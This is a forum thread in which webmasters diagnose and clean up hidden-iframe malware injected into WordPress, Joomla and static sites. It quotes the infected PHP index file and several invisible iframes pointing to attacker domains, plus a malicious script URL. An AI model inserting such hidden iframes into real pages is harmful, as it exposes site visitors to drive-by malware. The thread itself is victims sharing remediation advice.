My WordPress blog has an infection. I need help...

Whenever I go to my blog, my antivirus blocks access to it, citing a virus HTML/IFrame.gen.trojan

When I go to its feed, the message states an error with a code

<iframe src="http://hotslotpot.cn/in.cgi?income65" width=1 height=1 style="visibility: hidden"></iframe>

Code (markup):

I don't know what that code is doing on my blog. I need some advice...

P.S. I have wordpress 2.7.1 installed as CMS on the blog www.informationpile.com

EDIT:

Look at my index file... HELL........

<?php
/* Short and sweet */
define('WP_USE_THEMES', true);
require('./blog/wp-blog-header.php');

echo "<iframe src=\"http://xtrarobotz.com/?click=BC0230\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

echo "<iframe src=\"http://nipkelo.net/?click=E74A05\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

echo "<iframe src=\"http://internetcountercheck.com/?click=14784531\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
?>
<iframe src="http://hotslotpot.cn/in.cgi?income65" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="http://hotslotpot.cn/in.cgi?income66" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="http://hotslotpot.cn/in.cgi?income67" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="http://betworldwager.cn/in.cgi?income68" width=1 height=1 style="visibility: hidden"></iframe>


<iframe src="http://litecartop.cn/in.cgi?income70" width=1 height=1 style="visibility: hidden"></iframe>

Code (markup):

Now what! How did this happen???

 

Many files were infected... And this infection has spread to my other blogs as well... Very surprising... it is almost impossible to guess my FTP password. Maybe some plugin has been compromised and created a backdoor for the hackers.

 

Maybe but i never thought WP can get infected like that...you should only download certifies plugins meaning like...well known ones and not tom dick and harry ones..good luck

 

I guess some other folks also have this same problem...

http://wordpress.org/support/topic/264219

All my blogs are hosted with dreamhost. I hope this is sorted out soon...

EDIT: Oops... even my old-styled HTML sites have been hacked and virus code added to them. This seems like a server problem to me...

 

What i think the one reason behind is the plugin which you've download is plugged with viruses!

 

I have a very limited number of plugins, mostly related to SEO. I have been using them for 2 years and never had a problem.

But the surprising thing is even my websites which use no web 2.0 tech have been hacked. Websites hosted across different usernames have also been hacked. Some hard hack-bot at work, I guess. Dreamhost servers have been compromised.

 

http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from-cn-domains/

The server was compromised due to copies of out-dated CMS. I have Joomla, WordPress & Gallery on the same server. I wonder how hack-bots gained entry into my account. They infect mainly index.htm of index.php files, located deep into the heart of your directories.

Files that were hacked and virus code injected into them include
wp-includes/default-filters.php
themes/***/index.php
And all index.php files.

It is also advisable to check out wp-atom.php adn wp-header.php files for any infection.

To close all backdoors, all old backup copies of wordpress have to be removed. Static websites should be shifted to a different FTP account. If possible, it is advisable to segregate all websites and blogs into different accounts. Because if one domain is hacked, due to shared permission, all other websites could be compromised.

I have atleast 7 websites compromised, including static HTML websites, wordpress, joomla, gallery and drupal. I'm working to restore them and remove the infection...

 

here is the same thing and what to do
somewhere on that site you have removal tool but use it carefully

http://www.sulumitsretsambew.org/iframe-worms/

 

Thanks a lot for the link. The author said...

Unfortunately, I don't have cPanel on my hosting account. But I have decided to reinstall a fresh copy of wordpress on all affected sites. I have also changed my FTP passwords... My only worry is that this infection could come back. This is a huge waste of time. One of by blgs has already been flagged by Google for spreading malware...

Thanks again. I'll see what I can do to save it...

Regards.........

 

I had it on 8 sites. I cleaned my pc with nod32. Changed all ftp system passwords. Cleaned all sites manually, large joomla sites just bringed back backup. Removed all ftp programs from my pc, and got some with sftp. After 15 days no trails of another infection. It looks I am clean.

btw, I am the author there

I went crazy when people start to calling me what I did to their sites.

I was lucky I noticed maybe 2 hours after infection.

 

That is a nice blog...

I suspect this was not caused by FTP programs (though it is a probability). There is little chance of my PC being infected by a keylogger or a worm.

IMO, this was a result of old wordpress backup which could have vulnerabilities.

I had 3 FTP usernames & passwords stored with CuteFTP. But only 2 were hacked. Both of them had Wordpress installations, while the third one had a static website, and it was not hacked. So, I suspect a vulnerable wordpress backup caused the problem...

I am trying right now to remove old backup wordpress files and upgrading old CMS. I may have to remove it altogether and reinstall it if the infection returns.

Thanks again...

Cheers!

 

Well it is not keylogger, it is worm that pick up passwords from regedit or something...

Of all my sites which are infected here is their engine >>D

4 sites - Wordpress
1 site - Joomla
2 sites - SMF
1 site - Static html content

I had all their passes so as from 15 other pages in my WS FTP LE. I did not logged to any control panel. I did not typed any pass for over a 3 months.
Other 15 are not infected. Why hard to say. Maybe I reacted quickly enough.

On top of everything. This 8 sites are not on the same server. They are on 3 servers. On every server I have more sites and neither single one is infected.

 

One more attack on my blog..

94.247.2.195/jquery.js threat JS/Exploit.Agent.AGR trojan 

Code (markup):

Don't these hackers ever stop? What have I ever done to them?

I can't find the virus code... Now what do I do?

 

Hei, All my sites got hacked too, similar with that, I have remove the link manually, but then it happen again today. Please help me guys.

Thanks

Guniwan

 

1. First of all change all your FTP passwords. If you dont do that then there is no chance that you get rid of this infection.

2. Dont save the passwords in ftp on your computer. Ever.

3. Clean your computer from the Worm that picks up your passwords.

4. Bring back clean backup of your sites.

I had this too as I said 3 months ago and I succesfully cleaned my sites.
My experiences so as some removal too that you need to adopt manually
are here

http://www.sulumitsretsambew.org/iframe-worms-xtrarobotzcom-superbetfaircn-lotmachinesguidecn/

http://www.sulumitsretsambew.org/iframe-worms/

 

Not again! The iframe attacks are coming back to haunt me...

 <iframe src="http://combinebet.cn:8080/index.php" width=199 height=125 style="visibility: hidden"></iframe>

Code (markup):

This time on two static sites hosted on the same username. It had no other vulnerability.

Only one thing - the FTP password was stored in CuteFTP. It is highly unlikely that the software was hacked by spyware and the password leaked. But right now there is no other clue as to why some sites were hacked and others not...

 

To keep your wordpress blog from being hacked, learn how you can lock it down and harden it with simple steps and free tools. Read this free Wordpress Security Guide has everything you could ever want to know about securing and hardening wordpress sites (at no cost, using freely available tools)."]Wordpress Security Guide[/URL].